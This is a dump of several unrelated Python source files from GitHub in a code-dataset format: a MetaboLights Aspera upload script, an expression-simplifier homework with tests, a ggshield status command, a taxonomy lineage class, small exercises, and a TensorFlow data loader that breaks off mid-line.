configuration\n logging.info(\"Requesting project aspera upload configuration\")\n asperaConfiguration = requestUploadConfiguration()\n # logging.debug(\"(from Main) eval asperaConfiguration:\" + eval(asperaConfiguration) + asperaConfiguration +\" ??\")\n logging.info(\"Required project details obtained\")\n # Compile the aspera CLI command from the configuration\n logging.info(\"Compiling aspera command\")\n asperaCommand = compileAsperaCommand(asperaConfiguration)\n logging.info(\"asperaConfiguration: \" + asperaConfiguration[0] + asperaConfiguration[1] + asperaConfiguration[2] + asperaConfiguration[3] + asperaConfiguration[4] )\n logging.info(\"asperaConfiguration full: \" + asperaConfiguration)\n # logging.info(\"asperaConfiguration: \" + asperaConfiguration[\"content\"][\"asperaServer\"] )\n logging.info(\"Checking aspera Environment variables\")\n executeAsperaUpload(asperaCommand)\n else:\n logging.info(\"Input validation Failed: Terminating program\")\n print(\"Invalid Input: Please check the \" + log_file + \" for more details\")\n\n\ndef executeAsperaUpload(cmds):\n cmd = filter(None, cmds[1])\n print(\"CMD:\", cmds)\n cmd = filter(bool, cmd)\n # logging.info(\"CMD:\" , cmd)\n os.environ[\"ASPERA_SCP_PASS\"] = cmds[0]\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = p.communicate()\n logging.info(out)\n if err:\n logging.error(err)\n else:\n logging.info(\"Files uploaded successfully\")\n\n\ndef compileAsperaCommand(asperaConfiguration):\n\n logging.debug(\"this is asperaConfiguration (from compileAsperaCommand: \" + asperaConfiguration)\n try:\n # asperaConfiguration no longer a proper dictionary, just a regular string => need to convert back\n asperaConfiguration_asDict = ast.literal_eval(asperaConfiguration)\n # if isinstance(asperaConfiguration_asDict, dict):\n # for k, v in asperaConfiguration_asDict.items():\n # print(k, ' ', v)\n # else:\n # print(\"asperationConfiguration\", asperaConfiguration, \"is no dictionary!\")\n\n except IOError as e:\n print(e)\n\n filesLocation = (str(' '.join(str(e) for e in directories).strip() + \" \" + ' '.join(str(e) for e in files))).strip()\n remoteHost = asperaConfiguration_asDict['asperaUser'] + \"@\" + asperaConfiguration_asDict['asperaServer'] + \":/\" + env + \"/userSpace/\" + asperaConfiguration_asDict['asperaURL']\n # logging.debug(\"remoteHost = \" + remoteHost)\n logging.info(\"Project Location: \" + \"'/\" + env + \"/userSpace/\" + asperaConfiguration_asDict['asperaURL'] + \"'\")\n # asperaSecret = asperaConfiguration[\"asperaSecret\"]\n asperaSecret = asperaConfiguration_asDict['asperaSecret']\n # logging.info(\"aspera secret:\" + asperaConfiguration_asDict['asperaSecret'])\n return [asperaSecret, \"ascp -QT -P 33001 -L . -l 300M \" + filesLocation + \" \" + remoteHost]\n\n\ndef requestUploadConfiguration():\n # logging.basicConfig(file=sys.stderr, level=logging.DEBUG)\n # Requesting MetaboLightsLabs Webservice for the project configuration\n url = serverPortDictionary[env][\"server\"] \\\n + \"webservice/labs-workspace/asperaConfiguration\"\n payload = json.dumps({'api_token': api_token, 'project_id': project_id,\n 'new_project_flag': new_project_flag})\n headers = {'content-type': \"application/json\", 'cache-control': \"no-cache\"}\n # logging.debug(\"Here is the url: %s\", url)\n # logging.debug(\"Here is the payload: %s\", payload)\n # logging.debug(\"And, finally, the headers: %s\", headers)\n try:\n response = requests.request(\"POST\", url, data=str(payload),\n headers=headers)\n response.raise_for_status()\n except requests.HTTPError as e:\n logging.fatal(\"Request for upload configuration from MetaboLights server was unsuccessful\")\n logging.fatal(\"Server responded: %s\", response.text)\n logging.exception(e)\n sys.exit(1)\n except requests.exceptions.RequestException as e: # This is the correct syntax\n logging.error(e)\n print(\"Request failed! Refer to the log file for more details\")\n sys.exit(1)\n\n # logging.debug(\"response: %s\", response)\n # logging.debug(\"response.text: %s\", response.text)\n try:\n response_json = json.loads(response.text)['content']\n # logging.debug(\"response json: %s\", response_json)\n except ValueError as e:\n logging.error(e)\n print('Could not decode response from server!')\n sys.exit(1)\n return response_json\n\n\ndef parseInput(args):\n # Assigning the user api token to the global variable\n global api_token\n api_token = args.t\n logging.info('API Key:' + str(api_token))\n\n # Checking whether the input files and folders are valid and exist\n # Creating a array of files and folders that needs to be uploaded\n if args.i and not args.I:\n for entity in args.i:\n if os.path.isfile(entity):\n global files\n files.append(entity)\n logging.info(\n \"Adding \" + entity + \" to the files to be uploaded list\")\n if os.path.isdir(entity):\n global directories\n directories.append(entity)\n logging.info(\n \"Adding \" + entity + \" to the folders to be uploaded list\")\n elif args.I and not args.i:\n isatab_folder = args.I\n if args.v:\n with open(args.v) as fp:\n validation_report = json.load(fp)\n if validation_report['errors']:\n logging.info(\n \"Validation report supplied has {num_errors} errors, cancelling upload\".format(\n num_errors=len(validation_report['errors'])))\n return False\n else:\n logging.info(\"Validation report supplied has no errors\")\n logging.info(\n \"Validation report supplied has {num_warnings} warnings. You may wish to check and address these errors before finalizing your submission to MetaboLights\".format(\n num_warnings=len(validation_report['warnings'])))\n global tmpdir\n tmpdir = tempfile.mkdtemp()\n if os.path.isdir(isatab_folder):\n isazip_path = os.path.join(tmpdir, \"isa.zip\")\n with zipfile.ZipFile(isazip_path, \"w\") as zip:\n for isa_file in glob.glob(\n \"{}/[isa]*.txt\".format(isatab_folder)):\n zip.write(isa_file)\n files.append(isazip_path)\n mafzip_path = os.path.join(tmpdir, \"maf.zip\")\n with zipfile.ZipFile(mafzip_path, \"w\") as zip:\n for maf_file in glob.glob(\"{}/m_*.tsv\".format(isatab_folder)):\n zip.write(maf_file)\n files.append(mafzip_path)\n raw_data_types = (\"*.mzml\", \"*.mzML\", \"*.nmrml\", \"*.nmrML\")\n datazip_path = os.path.join(tmpdir, \"data.zip\")\n with zipfile.ZipFile(datazip_path, \"w\") as zip:\n data_files = []\n for file_type in raw_data_types:\n data_files.extend(\n glob.glob(os.path.join(tmpdir, file_type)))\n for data_file in data_files:\n zip.write(data_file)\n files.append(datazip_path)\n else:\n logging.warning(\"No input folder or files provided\")\n return False\n\n # Assigning env to the global variable\n global env\n env = args.s\n logging.info(\"Setting env flag: \" + str(env))\n\n # Assigning create new flag to the global variable\n global new_project_flag\n new_project_flag = str(args.n).lower()\n logging.info(\"Create new project flag provided: \" + str(new_project_flag))\n\n # Assigning ML project id to the global variable\n global project_id\n # If create new project flag is not set, making sure the project id exist\n if not new_project_flag:\n project_id = args.p\n logging.warning(\"Project_id assigned: \" + str(project_id))\n if not project_id:\n logging.warning(\n \"Project_ID not assigned. Please provide -n flag if you would like to create a new project\")\n return False\n else:\n project_id = args.p\n logging.info(\"Project_id assigned @Input : \" + str(project_id))\n\n # Checking if no files or folders exist\n if (len(files) == 0 and len(directories) == 0):\n logging.warning(\"No valid files or directories provided\")\n return False\n return True\n\n\nif __name__ == '__main__':\n try:\n sys.exit(main(sys.argv[1:]))\n finally:\n if tmpdir != '':\n shutil.rmtree(tmpdir)\n","repo_name":"ISA-tools/isatools-galaxy","sub_path":"tools/mtbls/uploadToMetaboLightsLabs.py","file_name":"uploadToMetaboLightsLabs.py","file_ext":"py","file_size_in_byte":12636,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70644446521","text":"#!/usr/bin/env python3\nfrom calcs import Calculator, Token, tokenize, represent_as_tree, to_postfix\nfrom string import ascii_lowercase\nimport copy\n\n\ndef merge_tokens(*args, integer_devision=False):\n new_token = Token('')\n new_token.pos = min([t.pos for t in args])\n new_token.end_pos = max([t.pos for t in args])\n new_token.priority = 0\n\n ch_queue = [t.ch for t in args if t.priority == 0]\n sign_queue = [t.ch for t in args if t.priority != 0]\n priority = max(args[0].priority, args[1].priority)\n merged_len = len(ch_queue)\n\n if str(args[0].ch) in '+*':\n # remove unary plus or mul\n sign_queue.pop(0)\n\n # Not power sign\n if priority < 3:\n new_val = int(ch_queue.pop(0))\n for i in range(len(ch_queue)):\n val = int(ch_queue.pop(0))\n sign = sign_queue.pop(0)\n if sign == '+':\n new_val += val\n elif sign == '-':\n new_val -= val\n elif sign == '*':\n new_val *= val\n elif sign == '/':\n new_val /= val\n if integer_devision:\n new_val = round(new_val)\n else:\n new_val = ch_queue.pop(-1)\n for i in range(len(ch_queue)):\n new_val = ch_queue.pop(-1) ** new_val\n\n new_token.ch = str(new_val)\n new_token.merged_len = merged_len\n if new_val < 0:\n sign = copy.copy(new_token)\n sign.ch = '-'\n new_token.ch = new_token.ch[1::]\n return [sign, new_token]\n return [new_token]\n\n\ndef simplify_with_var(node):\n pos = node[0].pos\n end_pos = node[-1].pos\n digits = [i.ch for i in node if str(i.ch).isdigit()]\n if len(node) > 4 and len(digits) > 1:\n calculable = []\n incalculable = []\n tokens = node.copy()\n first_var = []\n prev_token = None\n if tokens[0].ch in set(ascii_lowercase):\n first_var.append(tokens.pop(0))\n prev_token = first_var[0]\n for token in tokens:\n if token.ch in set(ascii_lowercase):\n incalculable.append(prev_token)\n incalculable.append(token)\n elif str(token.ch).isdigit():\n if prev_token:\n calculable.append(prev_token)\n calculable.append(token)\n prev_token = token\n incalculable = first_var + incalculable\n calculable = merge_tokens(*calculable, integer_devision=True)\n if incalculable[0].ch in set(ascii_lowercase):\n if int(calculable[0].ch) < 0:\n result = incalculable + tokenize('-') + calculable\n else:\n result = incalculable + tokenize('+') + calculable\n else:\n result = calculable + incalculable\n else:\n result = node\n result[0].pos = pos\n result[0].end_pos = end_pos\n return result\n\n\ndef merge(s1, operator, s2):\n s1, s2 = int(s1), int(s2)\n if operator == '+':\n return str(s1 + s2)\n elif operator == '-':\n return str(s1 - s2)\n elif operator == '*':\n return str(s1 * s2)\n elif operator == '/':\n return str(int(s1 / s2))\n elif operator == '^':\n return str(s1 ** s2)\n\n\nclass AbstractOptimiser:\n def process(self, graph):\n g = self.pre_process(graph)\n\n result = self.process_internal(g)\n\n return self.post_process(result)\n\n def pre_process(self, graph):\n return tokenize(graph)\n\n def process_internal(self, graph):\n return graph\n\n def post_process(self, result):\n return result\n\n\nclass DoubleNegativeOptimiser(AbstractOptimiser):\n # -(-a) -> a\n\n def process_internal(self, graph):\n chars = [str(t.ch) for t in graph]\n def select_brackets(str_repr: str):\n inner = ''\n processed = ''\n sign_queue = ['+']\n ctr = None\n while True:\n try:\n sym, str_repr = str_repr[0], str_repr[1::]\n if sym in '+-*/^' and ctr is None:\n sign_queue.append(sym)\n elif sym == '(' and ctr is None:\n ctr = 1\n elif sym == '(':\n ctr += 1\n elif sym == ')':\n ctr -= 1\n \n if ctr is not None and ctr == 0:\n break\n if ctr is not None and ctr > 0:\n inner += sym\n except IndexError:\n return processed, '', processed, str_repr\n processed += sym\n inner = inner[1::]\n return processed, sign_queue[-1], inner, str_repr\n\n def remove_dbl_neg(str_repr):\n processed, sign, inner, cut_str = select_brackets(str_repr)\n plus = ''\n left = processed.replace('{}({}'.format(sign, inner), '', 1)\n if left:\n left += '+'\n plus = '+'\n tokens = tokenize(inner)\n if sign == '-' and inner.startswith('-(') and inner.endswith(')'):\n str_repr = left + inner[2:len(inner) - 1] + cut_str\n elif len(tokens) == 2 and tokens[0].ch == '-':\n str_repr = str_repr.replace('-({})'.format(inner), plus + inner[1], 1) \n elif '(' not in inner:\n # sqr brackets added to avoid processing same brackets twice\n str_repr = str_repr.replace('(', '[', 1).replace(')', ']', 1)\n return str_repr\n\n str_repr = ''.join(chars)\n if '(' not in str_repr:\n # nothing to simplify\n return chars\n\n while True:\n new_repr = remove_dbl_neg(str_repr)\n if new_repr == str_repr:\n break\n str_repr = new_repr\n \n # remove sqr brackets and fix signs \n str_repr = str_repr.replace('[', '(').replace(']', ')').replace('+-', '-')\n new_opcodes = list(str_repr)\n return new_opcodes\n\n\nclass IntegerCostantsOptimiser(AbstractOptimiser):\n # a + 4*2 -> a + 8\n def process_internal(self, graph):\n if len(graph) < 3:\n return graph\n tree = represent_as_tree(graph)\n priority_lst = sorted(tree.keys(), reverse=True)\n prev_key = None\n higher_nodes = {}\n for key in priority_lst:\n branch = tree[key]\n for node in branch:\n if not prev_key:\n # if there is no nodes with higher priority\n # check if there is variable in this node\n if [t.ch for t in node if t.ch in set(ascii_lowercase)]:\n # put variables to the start or to the end of node,\n # and calculate the rest\n result = simplify_with_var(node)\n result[0].calculable = False\n else:\n # if no variable calculate the node\n result = merge_tokens(*node, integer_devision=True)\n result[0].calculable = True\n pos, end_pos = result[0].pos, result[0].end_pos\n higher_nodes[(pos, end_pos)] = result\n else:\n tokens = node.copy()\n node_pos = tokens[0].pos\n node_end_pos = tokens[-1].pos\n result = []\n left_side = []\n left_sign = []\n right_side = []\n right_sign = []\n used = []\n for limits in higher_nodes.keys():\n pos, end_pos = limits\n if node_end_pos <= pos:\n tokens.pop(-1) # remove outdated tokens\n right_sign = [tokens.pop(-1)]\n right_side = higher_nodes[limits]\n used.append(limits)\n\n if node_pos >= end_pos:\n tokens.pop(0) # remove outdated tokens\n left_sign = [tokens.pop(0)]\n left_side = higher_nodes[limits]\n used.append(limits)\n for l in used:\n del higher_nodes[l]\n\n if not [t.ch for t in tokens if\n t.ch in set(ascii_lowercase)]:\n if left_side and not [t.ch for t in left_side if\n t.ch in set(ascii_lowercase)]:\n # in left side doesn't contain variables\n new_exp = left_side + left_sign + tokens\n tokens = merge_tokens(*new_exp,\n integer_devision=True)\n left_side, left_sign = [], []\n if right_side and not [t.ch for t in right_side if t.ch\n in set(ascii_lowercase)]:\n new_exp = tokens + right_sign + right_side\n tokens = merge_tokens(*new_exp,\n integer_devision=True)\n right_side, right_sign = [], []\n result += left_side + left_sign + tokens + right_sign + right_side\n pos = result[0].pos\n\n # calculate result\n priorities = len({i.priority for i in result})\n if priorities < 3:\n # if all signs have same priority P, for variables\n # P = 0 by default\n result = simplify_with_var(result)\n\n # expanding new node limits\n try:\n end_pos = result[-1].end_pos\n except AttributeError:\n end_pos = result[-1].pos\n higher_nodes[(pos, end_pos)] = result\n prev_key = key\n\n return result\n\n def post_process(self, result):\n new_opcodes = [str(i.ch) for i in result]\n return new_opcodes\n\n\nclass SimplifierOptimiser(AbstractOptimiser):\n # a * 0 -> 0\n # a + 0 -> 0\n # * a or True -> True\n # * a and False -> False\n def process_internal(self, graph):\n def simplify_sum(node):\n variable_ctrs = {}\n order = []\n for t in node:\n if t.ch in set(ascii_lowercase) or str(t.ch).isdigit():\n if t.ch not in variable_ctrs.keys():\n order.append(str(t.ch))\n variable_ctrs[str(t.ch)] = 0\n if node[0].ch != '-':\n node = tokenize('+') + node\n for i in range(0, len(node), 2):\n sign = node[i].ch\n var = str(node[i + 1].ch)\n if sign == '-':\n variable_ctrs[var] -= 1\n else:\n variable_ctrs[var] += 1\n\n new_node = []\n for var in order:\n ctr = variable_ctrs[var]\n if ctr < 0:\n ctr = [str(ctr)[1::]]\n if ctr == ['1']:\n ctr = []\n else:\n ctr += ['*']\n new_node += ['-'] + ctr + [var]\n elif ctr > 0:\n ctr = [str(ctr)]\n if ctr == ['1']:\n ctr = ['+']\n else:\n ctr = ['+'] + ctr + ['*']\n new_node += ctr + [var]\n else:\n pass\n if len(new_node) == 0:\n return tokenize('0')\n new_node = tokenize(new_node)\n return new_node\n\n def simplify_division(node):\n variable_ctrs = {}\n order = []\n for t in node:\n if t.ch in set(ascii_lowercase) or str(t.ch).isdigit():\n if t.ch not in variable_ctrs.keys():\n order.append(str(t.ch))\n variable_ctrs[str(t.ch)] = 0\n if node[0].ch in set(ascii_lowercase):\n node = tokenize('*') + node\n for i in range(0, len(node), 2):\n sign = node[i].ch\n var = str(node[i + 1].ch)\n if sign == '/':\n variable_ctrs[var] -= 1\n else:\n variable_ctrs[var] += 1\n new_node = []\n for var in order:\n if str(var) != '1':\n ctr = variable_ctrs[var]\n if ctr < 0:\n new_node += ['/', var] * abs(ctr)\n elif ctr > 0:\n new_node += ['*', var] * ctr\n else:\n pass\n if len(new_node) == 0:\n return tokenize('1')\n if new_node[0] == '/':\n new_node = ['1'] + new_node\n elif new_node[0] == '*':\n new_node = new_node[1::]\n new_node = tokenize(new_node)\n return new_node\n\n def mul_by_zero(node):\n for i in range(len(node) - 1):\n ch_1, ch_2 = node[i].ch, node[i + 1].ch\n if str(ch_1) == '0' and str(ch_2) == '*':\n new_node = ['0']\n elif str(ch_1) == '*' and str(ch_2) == '0':\n new_node = ['0']\n else:\n new_node = [str(t.ch) for t in node]\n new_node = tokenize(new_node)\n return new_node\n\n def add_zero(node):\n if len(node) < 2:\n return node\n else:\n if node[0].priority == 0:\n node = tokenize('+') + node\n new_node = []\n for i in range(0, len(node) - 1, 2):\n ch_1, ch_2 = node[i].ch, node[i + 1].ch\n if str(ch_2) != '0':\n new_node.append(str(ch_1))\n new_node.append(str(ch_2))\n new_node = tokenize(new_node)\n return new_node\n\n def to_zero_pwr(node):\n zero_pwr = 0\n new_node = []\n for token in node[::-1]:\n if str(token.ch) == '0':\n zero_pwr = 2\n elif zero_pwr == 2:\n zero_pwr -= 1\n elif zero_pwr == 1:\n zero_pwr -= 1\n new_node += tokenize('1')\n else:\n new_node.append(token)\n zero_pwr = False\n return new_node[::-1]\n\n def simplify(node):\n priority_set = {t.priority for t in node if t.priority != 0}\n priority = min(priority_set)\n if priority == 3:\n node = to_zero_pwr(node)\n elif priority == 2:\n node = mul_by_zero(node)\n if len(node) > 2:\n node = simplify_division(node)\n elif priority == 1:\n if len(priority_set) == 1:\n node = simplify_sum(node)\n node = add_zero(node)\n return node\n\n tree = represent_as_tree(graph)\n priority_lst = sorted(tree.keys(), reverse=True)\n prev_key = None\n higher_nodes = {}\n result = graph\n for key in priority_lst:\n branch = tree[key]\n for node in branch:\n if not prev_key:\n # if there is no nodes with higher priority\n # check if there is variable in this node\n pos, end_pos = node[0].pos, node[-1].pos\n result = simplify(node)\n higher_nodes[(pos, end_pos)] = result\n else:\n tokens = node.copy()\n node_pos = tokens[0].pos\n node_end_pos = tokens[-1].pos\n result = []\n left_side = []\n left_sign = []\n right_side = []\n right_sign = []\n used = []\n for limits in higher_nodes.keys():\n pos, end_pos = limits\n if node_end_pos <= pos:\n tokens.pop(-1) # remove outdated tokens\n right_sign = [tokens.pop(-1)]\n right_side = higher_nodes[limits]\n used.append(limits)\n\n if node_pos >= end_pos:\n tokens.pop(0) # remove outdated tokens\n left_sign = [tokens.pop(0)]\n left_side = higher_nodes[limits]\n used.append(limits)\n for l in used:\n del higher_nodes[l]\n\n if left_side:\n # in left side doesn't contain variables\n new_exp = left_side + left_sign + tokens\n try:\n tokens = merge_tokens(*new_exp)\n except Exception as e:\n tokens = simplify(new_exp)\n left_side, left_sign = [], []\n if right_side:\n new_exp = tokens + right_sign + right_side\n try:\n tokens = merge_tokens(*new_exp)\n except Exception as e:\n tokens = simplify(new_exp)\n right_side, right_sign = [], []\n\n result += left_side + left_sign + tokens + right_sign + right_side\n\n pos = result[0].pos\n\n # expanding new node limits\n try:\n end_pos = result[-1].end_pos\n except AttributeError:\n end_pos = result[-1].pos\n higher_nodes[(pos, end_pos)] = result\n prev_key = key\n\n # return graph\n return result\n\n def post_process(self, result):\n new_opcodes = [str(i.ch) for i in result]\n return new_opcodes\n\n\ndef test_double_negetive():\n double_negate_tests = [\n ('-(-a)', 'a'),\n ('-(-5)', '5'),\n ('-(a+b)+c-(-d)', 'ab+-c+d+'),\n ]\n\n for case, exp in double_negate_tests:\n tokens = list(case)\n calc = Calculator(tokens, [DoubleNegativeOptimiser()])\n calc.optimise()\n\n if str(calc) != exp:\n print('Error in case for \"{}\". Actual \"{}\", expected {}'\n .format(case, calc, exp))\n\n\ndef test_integer_constant_optimiser():\n # test cases помеченные (*) не обязательны к прохождению. \n integer_constant_optimiser_tests = [\n (['1'], ['1']),\n (['1', '+', '2'], ['3']),\n (['1', '-', '2'], ['1-']),\n (['2', '*', '2'], ['4']),\n (['2', '/', '2'], ['1']),\n (['2', '^', '10'], ['1024']),\n (['a', '+', '2', '*', '4'], ['a8+', '8a+']),\n\n (['2', '+', 'a', '+', '3'], ['5a+', 'a5+']), # (*)\n ]\n\n for case, exp in integer_constant_optimiser_tests:\n calc = Calculator(case, [DoubleNegativeOptimiser(),\n IntegerCostantsOptimiser()])\n\n calc.optimise()\n\n if str(calc) not in exp:\n print('Error in case for \"{}\". Actual \"{}\", expected {}'\n .format(case, calc, exp))\n\n\ndef test_simplifier_optimiser():\n # test cases помеченные (*) не обязательны к прохождению. \n simplifier_optimiser_test = [\n ('a+0', ['a']),\n ('a*1', ['a']),\n ('a*0', ['0']),\n ('b/b', ['1']),\n ('a-a', ['0']),\n ('a+(b-b)', ['a']),\n ('a+(7-6-1)', ['a']),\n ('a^0', ['1']),\n ('a-(-(-a))', ['0']),# ???\n\n ('a+a+a', ['a3*', '3a*']), # (*)\n # ('(a-b)-(a-b)', ['0']), # (*)\n # ('(a-b)/(a-b)', ['1']), # (*)\n # ('(a+b)+(a+b)', ['ab+2*', '2ab+*']), # (*)\n # ('a*b+a*b', ['2ab**', '2ba**', 'a2b**', 'ab2**', 'b2a**', 'ba2**']),\n # (*)\n ]\n\n for case, exps in simplifier_optimiser_test:\n tokens = list(case)\n calc = Calculator(tokens, [DoubleNegativeOptimiser(),\n IntegerCostantsOptimiser(),\n SimplifierOptimiser()])\n\n calc.optimise()\n\n if str(calc) not in exps:\n print('Error in case for \"{}\". Actual \"{}\", expected {}'\n .format(case, calc, exps))\n\n# test_double_negetive()\n# test_integer_constant_optimiser()\n# test_simplifier_optimiser()\n\ndef valid_integer_constant_optimiser_test():\n integer_constant_optimiser_tests = [\n (['1'], ['1']),\n (['1', '+', '2'], ['3']),\n (['1', '-', '2'], ['1-']),\n (['2', '*', '2'], ['4']),\n (['2', '/', '2'], ['1']),\n (['2', '^', '10'], ['1024']),\n (['a', '+', '2', '*', '4'], ['a8+', '8a+']),\n\n (['2', '+', 'a', '+', '3'], ['5a+', 'a5+']), # (*)\n (list('-(-a)'), ['a']),\n (list('-(-(-(-a)))'), ['a']),\n (list('-(-5)'), ['5']),\n (list('-(a+b)+c-(-d)'), ['a-b+c+d+']),\n (list('-(-(a+b))'), ['ab+'])\n ]\n\n for case, exp in integer_constant_optimiser_tests:\n calc = Calculator(case, [DoubleNegativeOptimiser(), IntegerCostantsOptimiser()])\n\n try:\n if calc.validate():\n calc.optimise()\n\n strcase = ''.join(case)\n print(str(calc))\n res_bool = str(calc) in exp\n res_str = 'True' if res_bool else 'False'\n \n print(strcase + ' | ' + str(res_bool) + ' | ' + res_str)\n else:\n print('{} is not valid'.format(case))\n except Exception as e:\n raise e\n print(strcase, 'executed with exception')\n\n# valid_integer_constant_optimiser_test()\n\n# calc = Calculator('-(-(a+b))', [DoubleNegativeOptimiser()])\n# calc = Calculator('a-(-(-a))', [DoubleNegativeOptimiser(), IntegerCostantsOptimiser(), SimplifierOptimiser()])\n# calc.validate()\n# calc.optimise()\n# print(calc)","repo_name":"EgorOs/osinkin_hw6","sub_path":"optimisers.py","file_name":"optimisers.py","file_ext":"py","file_size_in_byte":22550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71069740281","text":"import logging\nfrom typing import Any\n\nimport click\n\nfrom ggshield.cmd.utils.common_options import add_common_options\nfrom ggshield.core.config import Config\nfrom ggshield.core.text_utils import STYLE, format_text\nfrom ggshield.verticals.hmsl import get_client\n\n\nlogger = logging.getLogger(__name__)\n\n\n@click.command()\n@click.pass_context\n@add_common_options()\ndef status_cmd(\n ctx: click.Context,\n **kwargs: Any,\n) -> int:\n \"\"\"\n Make sure the HasMySecretLeaked service is working properly.\n \"\"\"\n\n # Get our client\n config: Config = ctx.obj[\"config\"]\n client = get_client(config, ctx.command_path)\n\n click.echo(\n f\"{format_text('API URL:', STYLE['key'])} {client.url}\\n\"\n f\"{format_text('Authenticated:', STYLE['key'])} {str(client.jwt is not None).lower()}\\n\"\n f\"{format_text('Status:', STYLE['key'])} {format_status(client.status)}\\n\"\n )\n\n return 0\n\n\ndef format_status(health_check: bool) -> str:\n (color, status) = (\"green\", \"healthy\") if health_check else (\"red\", \"unhealthy\")\n return format_text(status, {\"fg\": color})\n","repo_name":"GitGuardian/ggshield","sub_path":"ggshield/cmd/hmsl/api_status.py","file_name":"api_status.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1431,"dataset":"github-code","pt":"40"} +{"seq_id":"41707108701","text":"'''\nCreated on Aug 29, 2011\n@author: Serena\n'''\n\nclass NoLineage(object):\n def get_taxon(self, rank):\n return None\n\n\nclass Lineage(object):\n ranks = [\n \"superkingdom\", \"kingdom\", \"phylum\", \"class\",\n \"order\", \"family\", \"genus\", \"species\"\n ]\n standard_rank_idx = dict(\n (rank, idx) for idx, rank in enumerate(ranks))\n\n def __init__(self, taxa):\n # Internally, taxa are stored using an integer to represent\n # the rank. This helps when comparing ranks to see which is\n # higher or lower\n self._taxa = [\n (name, self.standard_rank_idx.get(rank)) for name, rank in taxa]\n\n def get_taxon(self, rank):\n rank_idx = self.ranks.index(rank)\n for name, idx in self._taxa:\n if idx is None:\n continue\n elif idx == rank_idx:\n return name\n elif idx > rank_idx:\n return \"{0} ({1})\".format(name, rank)\n return None\n\n def get_standard_taxa(self, rank):\n rank_idx = self.ranks.index(rank)\n slice_idx = rank_idx + 1\n ranks_up_to = self.ranks[:slice_idx]\n for r in ranks_up_to:\n yield self.get_taxon(r)\n\n @staticmethod\n def is_generic_name(name):\n return (name == \"environmental samples\") or \\\n name.startswith(\"unclassified\")\n\n def is_generic(self, rank):\n rank_idx = self.ranks.index(rank)\n last_idx = 0\n for name, idx in self._taxa:\n if idx is None:\n if self.is_generic_name(name):\n if last_idx < rank_idx:\n return True\n else:\n if idx >= rank_idx:\n return False\n last_idx = idx\n return False\n","repo_name":"kylebittinger/brocc","sub_path":"brocclib/taxonomy.py","file_name":"taxonomy.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"21786173662","text":"L = [8, 24, 27, 48, 2,16, 9, 102, 7, 84, 91]\r\n\r\ndef max_min(L):\r\n max = L[0]\r\n min = L[0]\r\n for i in range(len(L)):\r\n if L[i] > max:\r\n max = L[i]\r\n if L[i] < min:\r\n min = L[i]\r\n return max, min\r\n\r\nprint(max_min(L))","repo_name":"andrea-gonzalezz/runtrack-python","sub_path":"Runtrack-python/jour4/job9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71888509879","text":"DEFAULT_COUNT_OF_COLUMNS = 7\nsum_of_all_prices = 0\ncount_of_lines = 0\ntry:\n with open(\"./resources/catalog_full.csv\") as file:\n for line in file:\n line_params = line.strip().split(\",\")\n if len(line_params) != DEFAULT_COUNT_OF_COLUMNS:\n raise ValueError\n else:\n price = float(line_params[len(line_params) - 1])\n sum_of_all_prices += price\n count_of_lines += 1\n average_price = sum_of_all_prices / count_of_lines\n print(\"{:.2f}\".format(average_price))\n\nexcept FileNotFoundError:\n print(\"Invalid file path.\")\nexcept ValueError:\n print(\"Invalid input data.\")\n","repo_name":"elitasheva/Python-Programming","sub_path":"Exercises/lecture_03/average_price.py","file_name":"average_price.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26242928007","text":"# TensorFlow y tf.keras\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.utils import plot_model\nfrom sklearn.metrics import classification_report, confusion_matrix\n\n\n# Librerias de ayuda\nimport numpy as np\nimport glob\nimport h5py\nfrom scipy.io import loadmat\n\ndirec = glob.glob('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/lote*')\n\n\ndef write_h5file(carpeta,nameF):\n \n files = glob.glob(carpeta + '/*.mat')\n\n # Train, Valid, Test sets\n setX = []\n setY = []\n\n\n #print(' La carpeta ' + carpeta + ' contiene ', len(files))\n for file in files:\n arc_mat = loadmat(file, struct_as_record=False)\n \n # Split the song data and labels\n data = arc_mat['data'].flatten()\n label = arc_mat['label']\n\n\n #print(data)\n #print(label)\n\n\n # Generate train, valid and test set\n setX.append(data)\n setY.append(label)\n\n\n # Stack the data vertically\n #setX = np.vstack(setX)\n #setY = np.array(setY)\n\n print(len(setX))\n print(len(setY))\n # Create the dataset file\n file = h5py.File('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/' + nameF +'.h5', 'w')\n\n # Add the data to the dataset\n file.create_dataset('setX', data=setX)\n file.create_dataset('setY', data=setY)\n \n\n # Close the file\n file.close()\n\ndef load_Dataset_from_h5file(h5file_path):\n\n\n # Read the H5File\n h5_file = h5py.File(h5file_path, 'r')\n\n # Separate the file values into train, valid and test set\n setX = h5_file['setX'][:]\n setY = h5_file['setY'][:]\n\n\n # Close the H5File\n h5_file.close()\n\n # Return the train, valid and test set\n return setX, setY\n\n#print(len(direc))\n#write_h5file('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/trainA','trainA')\n\n#write_h5file('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/testA','testA')\n\n\n\n# train_x, train_y = load_Dataset_from_h5file('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/lote_1/h5.h5')\ntrain_x, train_y = load_Dataset_from_h5file('./trainBin.h5')\nprint(train_x.shape)\ntrain_x = train_x.reshape(train_x.shape[0], train_x.shape[1], 1)\n#test_x, test_y = load_Dataset_from_h5file('/Users/carlossanchez/Desktop/AI_TrastornoAnsiedad/lote_26/h5.h5')\ntest_x, test_y = load_Dataset_from_h5file('./testBin.h5')\n\n\nvalidation_x = test_x[:int(len(test_x)*.50)]\nvalidation_y = test_y[:int(len(test_y)*.50)]\ntest_x= 